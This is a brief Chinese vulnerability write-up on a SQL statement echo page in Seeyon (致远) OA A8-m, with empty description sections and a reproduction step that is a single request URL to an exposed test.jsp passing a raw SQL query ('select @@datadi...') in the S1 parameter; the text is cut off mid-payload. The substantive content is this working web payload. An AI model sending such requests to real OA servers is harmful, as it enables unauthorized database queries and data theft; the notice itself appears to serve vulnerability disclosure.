致远OA A8-m 存在sql语句页面回显功能 =================================== 一、漏洞简介 ------------ 二、漏洞影响 ------------ 致远OA A8-m 三、复现过程 ------------ http://wwww.0-sec.org/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadi